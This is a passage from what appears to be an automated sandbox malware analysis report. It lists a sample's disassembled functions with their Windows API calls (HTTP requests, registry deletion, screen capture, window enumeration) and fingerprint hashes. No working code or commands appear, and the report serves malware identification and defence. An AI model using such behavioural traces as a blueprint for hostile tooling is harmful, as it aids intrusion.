                • Instruction ID: 58911a160798fae4085e71cfa98c49424545c1aacbf3403c8d09ff4042b0c67b
                • Opcode Fuzzy Hash: 2af42d13a9c312964b08f4d873f9f9a7ea4e6994561293056f1c3cf661d43e77
                • Instruction Fuzzy Hash: E7617C71108301AFC705DF64DC85DAFBBE8FF99750F00092EF596962A1DB309A89CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                Download Yara Rule
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0018C4B0
                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0018C4C3
                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0018C4D7
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0018C4F0
                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0018C533
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0018C549
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018C554
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0018C584
                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0018C5DC
                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0018C5F0
                • InternetCloseHandle.WININET(00000000), ref: 0018C5FB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                • String ID:
                • API String ID: 3800310941-3916222277
                • Opcode ID: 7fd70569f4d46b4f879f0cf638ed6b74eded294918ad87b1c790f85b3fc79c1a
                • Instruction ID: 382ae1742bfbc42151d3689ea5ca046381a863de77e7b147aae53a25e061e7f3
                • Opcode Fuzzy Hash: 7fd70569f4d46b4f879f0cf638ed6b74eded294918ad87b1c790f85b3fc79c1a
                • Instruction Fuzzy Hash: D0513DB1600605BFDB21AFA4C988AAB7BFCFF09754F10441AF94596650DB34EA449FB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 001A8592
                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85A2
                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85AD
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85BA
                • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85C8
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85D7
                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85E0
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85E7
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85F8
                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,001AFC38,?), ref: 001A8611
                • GlobalFree.KERNEL32(00000000), ref: 001A8621
                • GetObjectW.GDI32(?,00000018,?), ref: 001A8641
                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001A8671
                • DeleteObject.GDI32(?), ref: 001A8699
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001A86AF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3840717409-0
                • Opcode ID: ad43a7b62b4c47ec34e37c64d49cbce1d4eb7ba0e9b4e5ed11382eba0ee93461
                • Instruction ID: 24823edc82813c35e7ec4870b5c1a2a49c44a17b736b34c26d695f033ce8b345
                • Opcode Fuzzy Hash: ad43a7b62b4c47ec34e37c64d49cbce1d4eb7ba0e9b4e5ed11382eba0ee93461
                • Instruction Fuzzy Hash: E741F875600208AFDB11DFA5DC48EABBBB8FF8AB15F144159F909E7260DB309D41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(00000000), ref: 00181502
                • VariantCopy.OLEAUT32(?,?), ref: 0018150B
                • VariantClear.OLEAUT32(?), ref: 00181517
                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001815FB
                • VarR8FromDec.OLEAUT32(?,?), ref: 00181657
                • VariantInit.OLEAUT32(?), ref: 00181708
                • SysFreeString.OLEAUT32(?), ref: 0018178C
                • VariantClear.OLEAUT32(?), ref: 001817D8
                • VariantClear.OLEAUT32(?), ref: 001817E7
                • VariantInit.OLEAUT32(00000000), ref: 00181823
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                • String ID: %4d%02d%02d%02d%02d%02d$Default
                • API String ID: 1234038744-3931177956
                • Opcode ID: d3dc412e342ef84ec995b0dfc585a07677afea9a55aa585523b6362ded62451c
                • Instruction ID: fe0961081f1d6185c0e46b8e779762c1d9e210058a1b8429085ecf41c85b528e
                • Opcode Fuzzy Hash: d3dc412e342ef84ec995b0dfc585a07677afea9a55aa585523b6362ded62451c
                • Instruction Fuzzy Hash: 87D1F433A00115EBDB18AF65E885B7DB7B9BF46700F11806AF446AB580DB30DE92DF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019B6F4
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0019B772
                • RegDeleteValueW.ADVAPI32(?,?), ref: 0019B80A
                • RegCloseKey.ADVAPI32(?), ref: 0019B87E
                • RegCloseKey.ADVAPI32(?), ref: 0019B89C
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0019B8F2
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0019B904
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0019B922
                • FreeLibrary.KERNEL32(00000000), ref: 0019B983
                • RegCloseKey.ADVAPI32(00000000), ref: 0019B994
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 146587525-4033151799
                • Opcode ID: b83b99dcf0d014b4a5ebf47625d7007707b20b648de69c59e56133590136916d
                • Instruction ID: 683c81f9a221a71863496086a45047bc102771d544fe36b68d3626e96dc034bd
                • Opcode Fuzzy Hash: b83b99dcf0d014b4a5ebf47625d7007707b20b648de69c59e56133590136916d
                • Instruction Fuzzy Hash: C5C18C74208201AFDB14DF14D5D4F6ABBE5BF84308F14855CF5AA8B2A2CB71EC85CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 001925D8
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001925E8
                • CreateCompatibleDC.GDI32(?), ref: 001925F4
                • SelectObject.GDI32(00000000,?), ref: 00192601
                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0019266D
                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001926AC
                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001926D0
                • SelectObject.GDI32(?,?), ref: 001926D8
                • DeleteObject.GDI32(?), ref: 001926E1
                • DeleteDC.GDI32(?), ref: 001926E8
                • ReleaseDC.USER32(00000000,?), ref: 001926F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                • String ID: (
                • API String ID: 2598888154-3887548279
                • Opcode ID: fafcf9b9f2eeb924132b80984d5fd132924aeb848e95fe4f04b9ad9dd72ad5ac
                • Instruction ID: 160319584b397a64a76be7b62c9ef1fc5184308339de7c153373d0b3b8de8abc
                • Opcode Fuzzy Hash: fafcf9b9f2eeb924132b80984d5fd132924aeb848e95fe4f04b9ad9dd72ad5ac
                • Instruction Fuzzy Hash: 4061F3B5E00219EFCF04CFA4D984AAEBBF6FF58310F208529E955A7650E770A951CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___free_lconv_mon.LIBCMT ref: 0014DAA1
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D659
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D66B
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D67D
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D68F
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6A1
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6B3
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6C5
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6D7
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6E9
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6FB
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D70D
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D71F
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D731
                • _free.LIBCMT ref: 0014DA96
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014DAB8
                • _free.LIBCMT ref: 0014DACD
                • _free.LIBCMT ref: 0014DAD8
                • _free.LIBCMT ref: 0014DAFA
                • _free.LIBCMT ref: 0014DB0D
                • _free.LIBCMT ref: 0014DB1B
                • _free.LIBCMT ref: 0014DB26
                • _free.LIBCMT ref: 0014DB5E
                • _free.LIBCMT ref: 0014DB65
                • _free.LIBCMT ref: 0014DB82
                • _free.LIBCMT ref: 0014DB9A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 455c3444b639768d3ddb42487bc8a3e586a23d0d59b8ed93f656899140e7ea0f
                • Instruction ID: 1398c9005f09d16838f494e8e414bca8eb983cfbd0914609991c5b15662d064d
                • Opcode Fuzzy Hash: 455c3444b639768d3ddb42487bc8a3e586a23d0d59b8ed93f656899140e7ea0f
                • Instruction Fuzzy Hash: D8313B316047059FEF22AA39E845B5A77E9FF21315F65442AF449D72B1DF31AC80C721
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                Download Yara Rule
                APIs
                • GetClassNameW.USER32(?,?,00000100), ref: 0017369C
                • _wcslen.LIBCMT ref: 001736A7
                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00173797
                • GetClassNameW.USER32(?,?,00000400), ref: 0017380C
                • GetDlgCtrlID.USER32(?), ref: 0017385D
                • GetWindowRect.USER32(?,?), ref: 00173882
                • GetParent.USER32(?), ref: 001738A0
                • ScreenToClient.USER32(00000000), ref: 001738A7
                • GetClassNameW.USER32(?,?,00000100), ref: 00173921
                • GetWindowTextW.USER32(?,?,00000400), ref: 0017395D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                • String ID: %s%u
                • API String ID: 4010501982-679674701
                • Opcode ID: 1ea0a8b6edb41d93c7c1748281aa8577788b52a32a47cdce32748fa1e8968221
                • Instruction ID: 98942c81351f3d5b62260ffe648bf5879946c8b369171c2b080766dbab0c1f21
                • Opcode Fuzzy Hash: 1ea0a8b6edb41d93c7c1748281aa8577788b52a32a47cdce32748fa1e8968221
                • Instruction Fuzzy Hash: 71919171204606AFDB19DF24C885BEAF7B9FF44354F008629FAADD2190DB30EA45DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00174954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                Download Yara Rule
                APIs
                • GetClassNameW.USER32(?,?,00000400), ref: 00174994
                • GetWindowTextW.USER32(?,?,00000400), ref: 001749DA
                • _wcslen.LIBCMT ref: 001749EB
                • CharUpperBuffW.USER32(?,00000000), ref: 001749F7
                • _wcsstr.LIBVCRUNTIME ref: 00174A2C
                • GetClassNameW.USER32(00000018,?,00000400), ref: 00174A64
                • GetWindowTextW.USER32(?,?,00000400), ref: 00174A9D
                • GetClassNameW.USER32(00000018,?,00000400), ref: 00174AE6
                • GetClassNameW.USER32(?,?,00000400), ref: 00174B20
                • GetWindowRect.USER32(?,?), ref: 00174B8B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                • String ID: ThumbnailClass
                • API String ID: 1311036022-1241985126
                • Opcode ID: f947db1d733193e58ce063a1809cf5775ed5dcefb8a92a0e56796b4b4adb162b
                • Instruction ID: 8bf1c63db054613192092902ab3f1040ed07b41a4857a35e5a57b5d67d1e5601
                • Opcode Fuzzy Hash: f947db1d733193e58ce063a1809cf5775ed5dcefb8a92a0e56796b4b4adb162b
                • Instruction Fuzzy Hash: A591BD711042059FDB09DF14C981BAAB7F9FF98314F04846AFD8A9B196EB30ED45CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001A8D5A
                • GetFocus.USER32 ref: 001A8D6A
                • GetDlgCtrlID.USER32(00000000), ref: 001A8D75
                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 001A8E1D
                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001A8ECF
                • GetMenuItemCount.USER32(?), ref: 001A8EEC
                • GetMenuItemID.USER32(?,00000000), ref: 001A8EFC
                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001A8F2E
                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001A8F70
                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001A8FA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                • String ID: 0
                • API String ID: 1026556194-4108050209
                • Opcode ID: 60d054b62597221b9a12f629c808912f21aee436cefe8a857fdda61382f72837
                • Instruction ID: ec02e4ce0252e0169f50e26bf63b33b66bac1abf289c52ca5fa50006556687d0
                • Opcode Fuzzy Hash: 60d054b62597221b9a12f629c808912f21aee436cefe8a857fdda61382f72837
                • Instruction Fuzzy Hash: E581BF75608301AFDB10CF24D884AABBBE9FF9A314F04091DF985D7291DB30D941CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                Download Yara Rule
                APIs
                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0017DC20
                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0017DC46
                • _wcslen.LIBCMT ref: 0017DC50
                • _wcsstr.LIBVCRUNTIME ref: 0017DCA0
                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0017DCBC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1939486746-1459072770
                • Opcode ID: dc5999f56f2fc0d46daae1f42a246cbdefb08ed2e139ce2d632b415a61a331b8
                • Instruction ID: a573922d628caa8c42e96aac70de26d3482947ffb1de90b8b56af1a3d2df7bab
                • Opcode Fuzzy Hash: dc5999f56f2fc0d46daae1f42a246cbdefb08ed2e139ce2d632b415a61a331b8
                • Instruction Fuzzy Hash: E04145329402147ADB15A7B0EC43EFF37BCEF66750F11406AF904A61C2EB719A0197B4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                Download Yara Rule
                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0019CC64
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0019CC8D
                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0019CD48
                  • Part of subcall function 0019CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0019CCAA
                  • Part of subcall function 0019CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0019CCBD
                  • Part of subcall function 0019CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0019CCCF
                  • Part of subcall function 0019CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0019CD05
                  • Part of subcall function 0019CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0019CD28
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0019CCF3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 2734957052-4033151799
                • Opcode ID: 3cc54da6406a506718d9b6910a9586e9e052af1182d96b25831f7232b2863c49
                • Instruction ID: cd58e2cd4200af753a2c23e93f5731b8ee6be2e75b4e41c81d6c4beb53f45e92
                • Opcode Fuzzy Hash: 3cc54da6406a506718d9b6910a9586e9e052af1182d96b25831f7232b2863c49
                • Instruction Fuzzy Hash: D8316E75A01229BBDB208B94DC88EFFBBBCEF56750F000165F945E2240DB349E85DAE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00183D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00183D40
                • _wcslen.LIBCMT ref: 00183D6D
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00183D9D
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00183DBE
                • RemoveDirectoryW.KERNEL32(?), ref: 00183DCE
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00183E55
                • CloseHandle.KERNEL32(00000000), ref: 00183E60
                • CloseHandle.KERNEL32(00000000), ref: 00183E6B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 1149970189-3457252023
                • Opcode ID: 305c893fdb97dc234e428d6664e643e9f31f88bee30ae26bf872c4e2042784fe
                • Instruction ID: b622f09535f522f1408fcf332948ef2f00afbb8e00ce30f1caac93b84e176121
